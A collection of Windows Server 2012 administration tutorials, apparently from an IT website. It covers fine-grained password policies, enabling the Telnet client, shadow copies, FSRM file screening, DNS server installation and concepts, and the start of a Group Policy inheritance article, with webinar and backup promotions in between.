windows-2012-install-setup-fine-grained-password-policy-011

Figure 11. Selecting the Active Directory object to which the Fine Grained Password Policy will be applied to

Click on OK, and you will return to the Create Password Settings screen, which will now have the new name FGPP on top and the name of the user (to whom the policy will apply) at the bottom:

windows-2012-install-setup-fine-grained-password-policy-012

Figure 12. Our Fine Grained Password Policy

Click on OK to complete the process and go back to the Active Directory Administrative Center, which will now show the new Password Settings Container with the name FGPP and the precedence index in the center panel:

windows-2012-install-setup-fine-grained-password-policy-013

Figure 13. Our Fine Grained Password Policy appearing in the Password Settings Container

To modify any parameter, double click on the Password Settings Container in the central panel. Finally, when you are done, close the Active Directory Administrative Center window.

This article covered the installation and configuration of Fine-Grained Password Policies for Windows Server 2012. We explained how Fine-Grained Password Policies can be installed via PowerShell and the Active Directory Administrative Center. Our step-by-step guide shows all the necessary details to ensure a successful installation and configuration. More high-quality articles can be found in visit our Windows 2012 Section.

  • Hits: 15266

How to Install/Enable Telnet Client for Windows Server 2012 via GUI, Command Prompt and PowerShell

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-00IT professionals frequently need connectivity and management tools. The Telnet Client is one of the most basic tools for such activities. Using this tool, you can connect to a remote Telnet server and run applications on it. This is also a very useful tool for testing the connectivity to remote servers, such as those running SMTP services, web services and so on. In this article we will discuss how to install or enable Telnet client for Windows Server 2012, using the GUI interface or command prompt.

Microsoft operating systems since Windows NT have included the Telnet client as a feature. However, later Operating Systems beginning with the Windows Server 2008 and Windows Vista prefer not to enable it by default. Although you can always use a third-party tool for assisting you in remote connections and for troubleshooting connectivity, you can enable the Telnet client on your Windows Server 2012 any time needed.

Backup your Windows Server 2012 R2 host using Altaro’s Free Hyper-V & VMware Backup solution. Download Now!

Primarily, there are three ways you can install or enable the Telnet client for Windows Server 2012. You can install the Telnet client from the Graphical User Interface, Windows command prompt or from PowerShell. We will discuss all the methods in this article.

Installing Telnet Client From The GUI

Invoke the Server Manager by clicking on the second icon on the bottom taskbar on the desktop of the Windows Server 2012 R2:

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-01

Figure 1. Launching Windows Server Dashboard

On the Dashboard, click on Add Roles and Features, which opens the Add roles and features wizard:

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-02 
Figure 2. Selecting Add roles and features on Windows Server 2012

Click on Installation Type and select Role Based or Feature Based Installation. Click on Next to proceed:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-03

Figure 3. Selecting Installation Type – Role-based or feature-based installation

On the next screen, you can Select a server from the server pool. We select the server FW-DC1.firewall.local:

windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-04 
Figure 4. Selecting our server, DC1.firewall.local

Clicking on Next brings you to the Server Roles screen. As there is nothing to be done here, click on Next to continue to the Features screen. Now Scroll down under the Features until you arrive at the Telnet Client. Click within the box in front of the entry Telnet Client to select it, then click on Next to continue:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-05

Figure 5. Selecting the Telnet client for installation

The following screen asks you to Confirm Installation Selections. Click the Restart the destination server automatically if required tick box and click on Yes to confirm the automatic restart without notifications. Finally, click on Install to start the installation of the Telnet Client:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-06

Figure 6. Final confirmation and initiation of the Windows Telnet Client installation

Once completed, the Results screen will inform the success or failure of the process:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-07

Figure 7. Successful installation of Windows Server Telnet Client

Click on Close to end the installation and return to the Server Manager screen.

Running a Windows Hyper-V or VMware server? Hyper-V & VMware backup made easy with Altaro’s Free VM Backup solution. Download Now!

Installing Telnet Client From The Command Prompt

You need to invoke the Command Prompt window as an Administrator. For this, right click on the Windows Start icon located on the lower left corner on the desktop taskbar, then Click on Command Prompt (Admin) and click on Yes to the User Account Control query that opens up.

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-08

Figure 8. Launching a Command Prompt with Administrator privileges

 Once the Administrator: Command Prompt window opens, type the following command and press Enter:

C:\Windows\system32>dism /online /Enable-Feature /FeatureName:TelnetClient

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-09

Figure 9. Installing Telnet Client via Elevated Command Prompt

The command prompt will provide a real-time update within the command prompt window and inform you once the Telnet Client has been successfully installed.

To exit the command prompt window, simply click on the X button (top right corner) or type Exit and press Enter.

Note: It is possible to also install Windows Telnet Client on Windows 8 & Windows 8.1 using the same commands at the Command Line Prompt or PowerShell interface.

Installing Telnet Client From PowerShell

You need to invoke the PowerShell with elevated permissions, i.e., run as Administrator. For this, right click on the third icon from the left on the bottom taskbar on the desktop of the Windows Server 2012 R2:

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-010

Figure 10. Running PowerShell with Administrator privileges

Click on Run as Administrator and click on Yes to the User Account Control query that opens up.

Within the PowerShell window, type the following two commands, pressing Enter after each one:

PS C:\Windows\system32> Import-Module servermanager
PS C:\Windows\system32> Add-WindowsFeature telnet-client

 windows-2012-install-telnet-client-via-gui-cmd-prompt-powershell-011

Figure 11. Installing Telnet Client via PowerShell On Windows 2012 R2 Server

Windows PowerShell will commence installing Telnet Client and will inform you if the Telnet Client has been successfully installed and whether the server needs a restart.

Type Exit and press Enter to close the Windows PowerShell window.

This article showed how to install the Telnet Client on Windows Server 2012 R2 using the Windows GUI Interface, Elevated Command prompt and Windows PowerShell. For more exciting articles on Windows 2012 R2 server, visit our Windows 2012 Section.

  • Hits: 40346

How to Enable & Configure Shadow Copy for Shared Folders on Windows Server 2012 R2

When you shadow copy a disk volume, you are actually generating a snapshot of the changes made to the folders and files within the disk volume at a certain point in time. Windows 2012 R2 shadow copy feature allows taking snapshots at set intervals, so that users can revert and restore their folders and files to a previous version.

The shadow copy feature for backups is a much faster solution compared to the traditional backup solution. We should keep in mind that shadow copy is not meant as a replacement for the traditional backup process. The shadow copy process never copies all the files and folders, but only keeps track of the changes made to them. This is the reason shadow copy cannot replace the traditional backup process. Typically, shadow copies are useful in scenarios where one needs to restore an earlier version of files or folders.

To configure shadow copy of a shared folder in Windows Server 2012, at first, you have to enable the shadow copy feature on the disk volume containing the shared folder. The shadow copy process works only at volume level and not on individual files or directories. Additionally, it works only on NTFS volumes and not on FAT volumes. After generating a snapshot of the data, the server keeps track of changes occurring to the data.

Typically, the server stores the changes on the same volume as the original, but you can change the destination. Additionally, you can define the disk space allocated to shadow copies. As the allocated disk space fills up, the server deletes the oldest shadow copy snapshot, thereby making room for newer shadow copies. Once the server has deleted a shadow copy snapshot, you cannot retrieve it. Windows Server 2012 R2 can keep a maximum of 64 shadow copies per volume.

Running a Windows Hyper-V or VMware Server?  Hyper-V & VMware Backup made easy with Altaro’s Free VM Backup SolutionDownload Now!

Install File & Storage Services

The shadow copy feature requires prior installation of all the File and Storage Services. For installing or verifying the installation of all the File and Storage Services, logon to the server as a local administrator, go to the Server Manager Dashboard and click on Add Roles and Features.

windows-2012-shadow-copy-setup-generate-file-folder-01

Figure 1. Server Manager Dashboard

This opens the Add Roles and Features Wizard, wherein go to Server Selection to select the server on which you want to install the File and Storage Services:

windows-2012-shadow-copy-setup-generate-file-folder-02

Figure 2. Selecting our Windows 2012 R2 Server from the server pool

Click on Next and select Server Roles. Expand the File and Storage Services and the File and iSCSI Services. Check that tick marks are visible against all the services. Click on those missing the tick marks:

windows-2012-shadow-copy-setup-generate-file-folder-03

Figure 3. Selecting File & Storage Services, plus iSCSI Services for installation

Click Next four times until you arrive at Confirmation:

windows-2012-shadow-copy-setup-generate-file-folder-04

Figure 4. Add roles and Features – Final confirmation Window

Click on Install to enable all the File and Storage Services. Once the server has completed the installation, click on Close.

Enabling The Shadow Copy Feature

After having confirmed that the server has enabled all File and Storage Services, go to the server desktop and open the File Explorer. You can do this by pressing the WINDOWS+E keys together on your keyboard or by clicking on the fourth icon from left on the bottom toolbar on the Windows Server 2012 R2 desktop:

windows-2012-shadow-copy-setup-generate-file-folder-05 

Figure 5. Opening Windows File Explorer

We will enable shadow copy for the volume C:\. Within this volume, we have our folder C:\Users\Chris_Partsenidis_Share for which we would like to ensure shadow copy is enabled:

windows-2012-shadow-copy-setup-generate-file-folder-06

Figure 6. Location of the folder we will be using as a Shadow-Copy example

Right-click on the Local Disk or volume C:\ (Or any other volume depending on your requirements) and select Configure shadow copies from the drop-down menu:

windows-2012-shadow-copy-setup-generate-file-folder-07

Figure 7. How to enable Shadow Copy for a Windows Volume

When the UAC confirmation dialog box opens, confirm with Yes. This opens the screen for Shadow Copies. Under Select a volume, click to select the volume C:\ from the list or any other volume for which you want to turn on shadow copies. Now, click on Enable.

A confirmation dialog will appear to Enable Shadow Copies along with a warning about file servers with high I/O loads:

windows-2012-shadow-copy-setup-generate-file-folder-08

Figure 8. Enable Shadow Copy confirmation window

Click on Yes to complete the process. You will be returned to the Shadow Copies screen and under Shadow copies of the selected volume, you can see the newly created Shadow Copy for volume C:\:

windows-2012-shadow-copy-setup-generate-file-folder-09 

Figure 9. Viewing the status of Shadow Copy for our Volume

Click on Settings to open the Settings dialog. In the Settings dialog, under Maximum size, you can select either No limit for the space reserved or set a limit for it by selecting Use limit. Note that as stated in the dialog box, a minimum limit of 300MB is necessary for the space reserved for shadow copies:

windows-2012-shadow-copy-setup-generate-file-folder-10 

Figure 10. Setting the maximum size to be used by Shadow Copy for our volume

Next, you can either go with the default schedule of two snapshots of shadow copies every day, or define your own by clicking on Schedule to open the Schedule dialog:

windows-2012-shadow-copy-setup-generate-file-folder-11

Figure 11. Configuring the Shadow Copy Schedule

In the Schedule dialog, tweak the settings to fit your environment in the best possible way and click on Ok to return to the Shadow Copies dialog.

To create a current snapshot, click on Create Now and under Shadow Copies of Selected Volume, a date and time entry will appear, signifying that the server has created a shadow copy snapshot. Click on Ok to close the dialog.

Accessing Shadow Copies

Users can access the shared volume/folders from either their local server or from a client PC over the network. They can see the previous versions (shadow copies) of their folders and files from the Properties of the shared folder or file.

Go to File explorer and click on a shared volume - volume C:\ in our case. Select the shared folder within the shared volume – which, in our example, is C:\Users\Chris_Partsenidis. Right-click on the shared folder and go to Restore previous versions:

windows-2012-shadow-copy-setup-generate-file-folder-12

Figure 12. Viewing the Shadow Copy status of our shared folder

This opens the Properties dialog for the share folder - C:\Users\Chris_Partsenidis. The list under Folder versions has all the shadow copies created for the share folder – C:\Users\Chris_Partsenidis. From this list, you can select a specific previous version (shadow copy) and choose to Open, Copy or Restore it.

windows-2012-shadow-copy-setup-generate-file-folder-13

Figure 13. Accessing previous versions of our shared folder

After you have completed your work, click on Ok or Cancel to exit the dialog box.

This article explained the purpose Windows Shadow Copy services, how to enable and configure Shadow Copy for a Windows Volume. We also saw how administrators and users can access previous versions of folders/files that are located in a shadow-copy enabled volume.

  • Hits: 35043

Windows Server 2012 File Server Resources Manager (FSRM) Installation & Configuration - Block Saving Of Specific File Types on Windows Server

The Windows Server 2008 first carried FSRM or Fie Server Resources Manager, which allowed administrators to define the file types that users could save to file servers. Windows FSRM has been a part of all succeeding Windows Servers, and administrators can now block defined file types from being uploaded to a specific folder or to an entire volume on the server.

Before you can begin blocking file extensions, you may need to install and configure FSRM on your Windows Server 2012 R2. Installation of FSRM can be achieved through the Server Manager GUI or by using the PowerShell console.

This article will examine the installation of FSRM using both methods, Server Manager GUI and Windows Server PowerShell console, while providing all necessary information to ensure a successful deployment and configuration of FSRM services.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Installing FSRM On Server 2012 Using The Server Manager GUI

Assuming you are logged in as the administrator, start with the Server Manager – click on the second icon from left on the bottom toolbar on the desktop as shown below:

windows-2012-fsrm-installation-configuration-block-defined-file-types-1

Figure 1. Launching the Server Manager Dashboard

This brings up the Server Manager Dashboard. Proceed to the top right hand corner and click on Manage, then click on Add Roles and Features.

windows-2012-fsrm-installation-configuration-block-defined-file-types-2
Figure 2. Opening Add Roles and Features console

This opens the Add Roles and Features Wizard, where you need to click on Server Selection. Depending on how many servers you are currently managing, the right hand side will show one or multiple servers in the pool. Select the file server on which you want to install FSRM, and click on Next to proceed.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-3

Figure 3. Selecting a Server to add the FSRM role

The next screen shows the server roles that you can install on the selected server. On the right hand side, locate File and Storage Services and expand it. Locate the File and iSCSI services and expand it. Now, locate the File Server Resource Manager entry.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-4
Figure 4. Selecting the File Server Resource Manager role for installation

Click on the check box in front of the entry File Server Resource Manager. This will open up the confirmation dialog box for the additional features that you must first install before installing FSRM.

windows-2012-fsrm-installation-configuration-block-defined-file-types-5 
Figure 5. Confirming the installation of additional role services required for FSRM

Click on Add Features and you are all set to install FSRM, as the check box for File Server Resource Manager now has a tick mark (shown below).

windows-2012-fsrm-installation-configuration-block-defined-file-types-6

Figure 6. Back to the Server Role installation – Confirming FSRM Role Selection

Clicking on Next allows you to Select one or more features to install on the selected server. We don’t need to add anything here at this stage, so click Next to go to the next step.

This brings up a screen asking you to Confirm installation selections. This is the stage where you have the last chance to go back and make any changes, before the actual installation starts.

windows-2012-fsrm-installation-configuration-block-defined-file-types-7 
Figure 7. Confirm installation selections

Click on Install to allow the installation to commence and show the progress on the progress bar on the Results screen. Once completed, you can see the Installation successful on … under the progress bar.

windows-2012-fsrm-installation-configuration-block-defined-file-types-8 
Figure 8. Completion of FSRM role installation

Click on Close to exit the process.

To check if the FSRM has actually started running, go to the Server Manager Dashboard and click on File and Storage Services on the left hand side of the screen.

windows-2012-fsrm-installation-configuration-block-defined-file-types-9 
Figure 9. Server Manager Dashboard

The Dashboard now shows all the servers running under the File and Storage Services. Go down to Services and you will see FSRM running with an automatic start up.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-10

Figure 10. File and Storage Services – Confirming FSRM Service

Installing FSRM On Server 2012 Using The PowerShell Console

This is a comparatively easier and faster process compared to the GUI method.

To invoke the PowerShell, click the third icon from left on the bottom toolbar on the desktop.

windows-2012-fsrm-installation-configuration-block-defined-file-types-11 
Figure 11. Launching Windows PowerShell

 This will open up a console with an administrative level command prompt. At the command prompt, type:

C:\Users\Administrator> Add-WindowsFeature –Name FS-Resource-Manager –IncludeManagementTools

windows-2012-fsrm-installation-configuration-block-defined-file-types-12

Figure 12.  Executing PowerShell command to install FSRM

A successful installation will be indicated as True , under the Success column as shown above.

FREE Hyper-V & VMware Backup:  Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Configuring File Screening

Invoke FSRM from the Tools menu on the top right hand corner of the Server Manager Dashboard.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-13

Figure 13. Running the File Server Resource Manager component

The File Server Resource Manager screen opens up. On the left panel, expand the File Screening Management and go to File Groups. The central panel shows the File Groups, the Include Files and the Exclude Files in three columns.

Under the column File Groups, you will find file types conveniently grouped together. The column Include Files lists all file extensions that are included in the specific file group. For a new server, the column Exclude Files is typically empty.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-14

Figure 14 – File Groups, Include File and Exclude Files

On the left panel, go to File Screen Templates and click on it. The central panel shows predefined rules that apply to folders or volumes.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-15

Figure 15. File Server Resource Manager - File Screen Templates

For instance, double-click on Block Image Files in the central panel. This opens up the File Screen Template Properties for Block Image Files. Here you can define all the actions that the server will take when it encounters a situation where a user is trying to save a file belonging to the excluded group.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-16

Figure 16. FSRM - File Screen Template Properties for Block Image Files

You can choose to screen the specified file type either actively or passively. Active screening disallows users from saving the specified file group. With passive screening, users are not prevented from saving the files while the administrator can monitor their actions.

The server can send from one to four basic alerts when it encounters an attempt to save a forbidden file. The server can send an Email message to the administrator, create an entry in the Event Log, run a specified Command or Script and or generate a Report. You can set up the details for each action on individual tabs. When completed, exit by clicking on OK or Cancel.

To edit the existing template or to create a new one based on the chosen template, go to the File Screen Templates and in the central panel, right-click on the predefined template you would like to edit. From the Actions menu on the right panel, you can either Create File Screen Template or Edit Template Properties.

windows-2012-fsrm-installation-configuration-block-defined-file-types-17 
Figure 17. FSRM – Creating or editing a File Screen Template

Clicking on Create File Screen Template opens up a dialog where you can click on Browse to select a folder or volume on which the new rule would be applied. Under How do you want to configure file screen properties? You can either Derive or Create the file screen properties. Click on Create to allow the new file screen rule to appear in the central panel.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-18

Figure 18. FSRM - Creating a File Screen

Creating Exceptions

Exceptions are useful when you want to allow a blocked file type to be saved in a specific location. Go to the left panel of the FSRM screen and right-click on File Screens.

windows-2012-fsrm-installation-configuration-block-defined-file-types-19

Figure 19. FSRM – Creating a File Screen Exception

From the menu on the right panel, click on Create File Screen Exception. On the menu that opens up, click on Browse to select a folder or volume on which the new rule would be applied and select the group you would like to exclude under the File groups. Click OK and complete the process.

 windows-2012-fsrm-installation-configuration-block-defined-file-types-20

Figure 20. FSRM – File Screen Exception settings and options

Summary

This article showed how to we can use Windows Server File Server Resources Manager (FSRM) to block file types and extensions from being uploaded or saved to a directory or volume on a  Windows 2012 R2 server.  We explained how to perform installation of FSRM via GUI interface and Powershell, and covered the creation or editing of File Screen Templates used to block or permit access for specific files.

  • Hits: 23739

New Upcoming Features in Hyper-V vNext - Free Training From Leading Hyper-V Experts – Limited Seats!

With the release of Hyper-V vNext just around the corner, Altaro has organized a Free webinar that will take you right into the new Hyper-V vNext release. Microsoft Hyper-V MVP, Aidan Finn and Microsoft Sr. Technical Evangelist Rick Claus will take you through the new features, improvements, changes and much more, and will be available to answer any questions you might have.

Don't lose this opportunity to stay ahead of the rest, learn about the new Hyper-V vNext features and have your questions answered by Microsoft Hyper-V experts!

Note: This Webinar date has passed, however the recording and all material presented are freely available by visiting the provided registration line below:

Click here to view this Free Webinar.

windows-virtualization-hyper-v-vnext-features-webinar-1

  • Hits: 10706

Free Webinar & eBook on Microsoft Licensing for Virtual Environments (Hyper-V)

hyper-v-altaro-free-webinar-ebook-1Microsoft Licensing for Virtual environments can become a very complicated topic, especially with all the misconceptions and false information out there. Thankfully Altaro, the leader in Hyper-V Backup solutions, has gathered Hyper-V MVP experts Thomas Maurer and Andrew Syrewicze to walk us through the theory and present us with real licensing scenarios to help us gain a solid understanding of Microsoft licensing in virtual environments.

Their Hyper-V experts will also be available to answer all questions presented during the free webinar.  Registration and participation for this webinar is complete free.

Webinar Details: This webinar has passed however a recorded version is available at the below url along with all necessary resources.

As a bonus, a free eBook written by Hyper-V expert Eric Siron, covering Licensing Microsoft Server in a Virtual Environment, is now available as a free download.

To download your free eBook copy and register for the Free Webinar click here.

 

  • Hits: 12548

Free Hyper-V eBook - Create, Manage and Troubleshoot Your Hyper-V VMs. Free PowerShell Scripts Included!

hyper-v-altaro-cookbook-1With the introduction of Hyper-V on the Windows Server platform, virtualization has quickly become the de facto standard for all companies seeking to consolidate their server infrastructure. While we've covered a number of virtualization topics, including Hyper-V installation, Management-Configuration, Hyper-V Backups, Best Practices and much more, this e-Book offered by Altaro is all about getting the most out of your Hyper-V infrastructure.

The Altaro PowerShell Hyper-V Cookbook has been written by Jeffery Hicks - a well known PowerShell MVP, covers a number of very important topics that are guaranteed to help you discover more about your Hyper-V server(s) and help you make the most out of what they can offer.

Topics covered include:

  • Hyper-V Cmdlets - Understand what they are, how to use them and create a Hyper-V virtual machine
  • Discover and display information about your VMs and Hyper-V host
  • Easily Identify VHD/VHDX files
  • Mount ISO files
  • Delete obsolete snapshots and query Hyper-V event logs
  • and much more!

 Don't miss this opportunity and grab your free copy for a limited time!

 BONUS: All PowerShell scripts are included FREE in a separate ZIP file!

  • Hits: 14051

How to Install and Configure Windows 2012 DNS Server Role

Our previous article covered introduction to the Domain Name System (DNS) and explained the importance of the DNS Server role within the network infrastructure, especially when Active Directory is involved. This article will cover the installation of the DNS server role in Windows 2012 Server and will include all necessary information for the successful deployment and configuration of the DNS service. Users interested can also read our DNS articles covering the Linux operating system or analysis of the DNS Protocol under our Network Protocols section.

The DNS Server can be installed during the deployment of Active Directory Services or as a stand-alone service on any Windows server. We'll be covering both options in this article.

FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

DNS Server Installation via Active Directory Services Deployment

Administrators who are in the process deploying Active Directory Services will be prompted to install the DNS server role during the AD installation process, as shown in the figure 1 below:

windows-2012-dns-server-installation-configuration-1Figure 1. DNS Installation via Active Directory Services Deployment

Alternatively Administrators can select to install DNS server role later on or even on a different server, as shown next. We decided to install the DNS Server role on the Active Directory Domain Controller Server.

DNS Server Installation on Domain Controller or Stand Alone Server

To begin the installation, open Server Manger and click Add Roles and Features. Click Next on Before you begin page. Now choose Role-based or feature-based installation and click Next:

Figure 2. Selecting Role-based or feature-based installation

In the next screen, choose the Select a server from this server pool option and select the server for which the DNS server role is intended. Once selected, click the Next button as shown in figure 3:

windows-2012-dns-server-installation-configuration-3Figure 3. Selecting the Server that will host the DNS server role

 The next screen allows us to choose the role(s) that will be installed. Select the DNS server role from the list and click Next to continue:

windows-2012-dns-server-installation-configuration-4 Figure 4. Selecting the DNS Server Role for installation

The next screen is the Features page, where you can safely click Next without selecting any feature from the list.

The next screen provides information on the DNS Server role that's about to be installed. Read the DNS Server information and click Next:

windows-2012-dns-server-installation-configuration-5Figure 5. DNS Information

The final screen is a confirmation of roles and services to be installed. When ready, click on the Install button to for the installation to begin:

windows-2012-dns-server-installation-configuration-6Figure 6. Confirm Installation Selections

The Wizard will provide an update on the installation progress as shown below. Once the installation has completed, click the Close button:

windows-2012-dns-server-installation-configuration-7Figure 7. Installation Progress

 

FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Configuring Properties of DNS Server

Upon the successful installation of the DNS server role, you can open the DNS Manager to configure the DNS Server. Once DNS Manager is open, expand the server, in our example the server is FW-DC1. Right below the server we can see the Forward Lookup Zones and Reverse Lookup Zones listed. Because this is an Active Directory Integrated DNS server there is a firewall.local and _msdcs.firewall.local zone installed by default, as shown in figure 8:

windows-2012-dns-server-installation-configuration-8Figure 8. DNS Manager & DNS Zones

To configure the DNS server properties, right-click the DNS server and click properties. Next, select the Forwarders tab. Click Edit and add the IP address of DNS server that this server will query if it is unable to resolve the IP address of the listed domains. This is usually the ISP's DNS server or any public DNS server such as Google (e.g 8.8.8.8, 4.2.2.2). There is another feature called root hints which also does similar job (queries the Root DNS servers of the Internet) but we prefer using forwarders alongside with public DNS servers:

windows-2012-dns-server-installation-configuration-9Figure 9. DNS Forwarders – Add your ISP or Public DNS Servers here

Next, click on the Advanced tab. Here you can configure advanced features such as round robin (in case of multiple DNS servers), scavenging period and so on. Scavenging is a feature often used as it deletes the stale or inactive DNS records after the configured period, set to 7 days in our example:

windows-2012-dns-server-installation-configuration-10 Figure 10. Advanced Options - Scavenging

Next up is the Root Hints tab. Here, you will see list of 13 Root Servers. These servers are used when our DNS server is unable to resolve DNS requests for its clients. The Root Servers are used when no DNS Forwarding is configured. As we can see, DNS forwarding is pretty much an optional but recommended configuration. It is highly unlikely administrators will ever need to change the Root Hints servers:

windows-2012-dns-server-installation-configuration-11Figure 11. Root Hints

Our next tab, Monitoring is also worth exploring. Here you can perform the DNS lookup test that will run queries against your newly installed DNS server. You can also configure automated test that will run at a configured time interval to ensure the DNS server is operating correctly:

windows-2012-dns-server-installation-configuration-12Figure 12. Monitoring Tab – Configuring Automated DNS Test Queries

Next, click on the Event Logging tab. Here you can configure options to log DNS events. By default, all events are logged. So you can configure to log only errors, warnings, combination of errors & warnings, or turn off logging (No events option):

windows-2012-dns-server-installation-configuration-13Figure 13. Event Logging

When Event Logging is enabled, you can view any type of logged events in the Event Viewer (Administrative Tools) console.

The Debug Logging tab is next up. Debug Logging allows us to capture to a log file any packets sent and received by the DNS server. Think of it as Wireshark for your DNS server. You can log DNS packets and filter them by direction, protocols, IP addresses, and other parameters as shown below. You can setup the log file location and set the maximum file size in bytes:

windows-2012-dns-server-installation-configuration-14Figure 14. Debug Logging – Capturing DNS Packets & Configuring DNS Debugging

Zone – Domain Properties

Each Zone or Domain has a specific set of properties which can be configured as shown in figure 15 below. In our example, firewall.local is an Active Directory-integrated zone as indicated by the Type field. Furthermore the zone's status is shown at the top area of the window – our zone is currently in the running state and can be paused by simply clicking on the pause button on the right:

windows-2012-dns-server-installation-configuration-15Figure 15. Zone Properties

Right below, you can change the zone type to primary, secondary or stub. You can also setup dynamic updates to be secure or not. Similarly, you can setup aging or scavenging properties to automate the cleanup of stale records.

The Start of Authority (SOA) tab provides access to a number of important settings for our DNS server. Here, you can configure the serial number increments automatically every time there is a change in the DNS zone. The serial number is used by other DNS servers to identify if any changes have been made since the last time they replicated the zone. The Primary server field indicates which server is primary server where the zone or domain is hosted. In case there are multiple DNS servers in the network, we can easily select a different server from here:

windows-2012-dns-server-installation-configuration-16Figure 16. Start Of Authority Settings

In addition, you can also configure the TTL (Time to Live) value, refresh, retry intervals and expiry time of the record.

Next is the Name Servers tab. In this tab, you can add list of name servers where this zone can be hosted:

windows-2012-dns-server-installation-configuration-17Figure 17. DNS Name Servers

Finally, the Zone Transfers tab. In this tab, you can add DNS servers which can copy zone information (zone transfer) from this DNS server:

windows-2012-dns-server-installation-configuration-18Figure 18. Zone Transfers

Once all configuration changes have been completed, click Apply and your zone is good to go.

FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

This article showed how to install and configure Windows 2012 DNS Server Role and explained all DNS Server options available for configuration.

  • Hits: 45047

Introduction to Windows DNS – The Importance of DNS for Active Directory Services

windows-2012-dns-active-directory-importance-1The Domain Name System (DNS) is perhaps one of the most important services for Active Directory. DNS provides name resolution services for Active Directory, resolving hostnames, URLs and Fully Qualified Domain Names (FQDN) into IP addresses. The DNS Service uses UDP port 53 and in some cases TCP port 53 - when UDP DNS requests fail consistently. (Double-Check for Windows)

In-Depth information and analysis of the DNS protocol structure can be found at our DNS Protocol Analysis article.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

How DNS Resolution Works

When installed on a Windows Server, DNS uses a database stored in Active Directory or in a file and contains lists of domain names and corresponding IP addresses. When a client requests a website by typing a domain (URL) inside the web browser, the very first thing the browser does is to resolve the domain to an IP address.

To resolve the IP address the browser checks into various places. At first, it checks the local cache of the computer, if there is no entry for the domain in question, it then checks the local hosts file (C:\windows\system32\drivers\etc\hosts), and if no record is found their either, it finally queries the DNS server.

The DNS server returns the IP address to the client and the browser forms the http request which is sent to the destination web server.

The above series of events describes a typical http request to a site on the Internet. The same series of events are usually followed when requesting access to resources within the local network and Active Directory, with the only difference that the local DNS server is aware of all internal hosts and domains.

A DNS Server can be configured in any server running Windows Server 2012 operating system. The DNS server can be Active Directory integrated or not. A few important tasks a DNS server in Windows Server 2012 is used for are:

  • Resolve host names to their corresponding IP address (DNS)
  • Resolve IP address to their corresponding host name (Reverse DNS)
  • Locate Global Catalog Servers and Domain Controllers
  • Locate Mail Servers

DNS Zones & Records

A DNS Server contains Forward Lookup Zone and Reverse Lookup Zone. Each zone contains different types of resource records. A Forward Lookup Zone maps host name to an IP address while Reverse Lookup Zone maps the IP address of the host name. The DNS Zone is stored in a file or in the Active Directory database. Only one copy of zone is writable and others are read-only if the zone is stored in Active Directory database. Resource records specify the type of resource.

Resource records in Forward Lookup Zone include:

Resource Type

Record

Host Name

A

Mail Exchange

MX

Service

SRV

Start of Authority

SOA

Alias

CNAME

 Name Server

 NS

Table 1. Resource Record Types

Similarly, resource records in Reverse Lookup Zone include:

Resource Type

Record

Pointer

PTR

Start of Authority

SOA

Name Server

NS

Table 2. Reverse Lookup Zone Resource Record Types

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Types Of DNS Zone

There are four DNS zone types:

Primary Zones: This is a Master DNS Server for a zone and stores the master copy of zone data in AD DS or in a local file. This zone is the primary source for information about this zone.

Secondary Zones: This is a Secondary DNS Server for a zone and stores read-only copy of zone data in a local file. Secondary Zones cannot be stored in AD DS. The server that hosts Secondary Zones, retrieves DNS information from another DNS server where the original zone is hosted and must have network access to the remote DNS server.

Stub Zones: A Stub Zone contains only those resource records that are required to identify the authoritative DNS servers of that zone. A Stub Zone contains only SOA, NS and A type resource records which are required to identify the authoritative name server.

Active Directory-Integrated Zones: An Active Directory-Integrated Zone stores zone data in Active Directory. The DNS server can use Active Directory replication model to replicate DNS changes between Domain Controllers. This allows for multiple writable Domain Controllers in the network. Similarly, secure dynamic updates are also supported, which means that computers that have joined to the domain can have their own DNS records in the DNS server.

This article provided information about DNS services and a brief description of the DNS resolution process. We also explained the importance of DNS Services in Active Directory and saw which are the four different type of DNS Zones. Next article will show how to install the DNS Server role in Windows Server 2012.

  • Hits: 40797

Windows Server Group Policy Link Enforcement, Inheritance and Block Inheritance

windows-2012-group-policy-enforcement-4Our previous article explained what Group Policy Objects (GPO) are and showed how group policies can be configured to help control computers and users within an Active Directory domain. This article takes a look at Group Policy Enforcement, Inheritance and Block Inheritance throughout our Active Directory structure. Users seeking more technical articles on Windows 2012 Server can visit our dedicated Windows 2012 Server section.

Group Policy Enforcement, Inheritance and Block Inheritance provide administrators with the necessary flexibility allowing the successful Group Policy deployment within Active Directory, especially in large organizations where multiple GPOs are applied at different levels within the Active Directory, causing some GPOs to accidently override others.

Thankfully Active Directory provides a simple way for granular control of GPOs:

 

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

 

Group Policy Object Inheritance

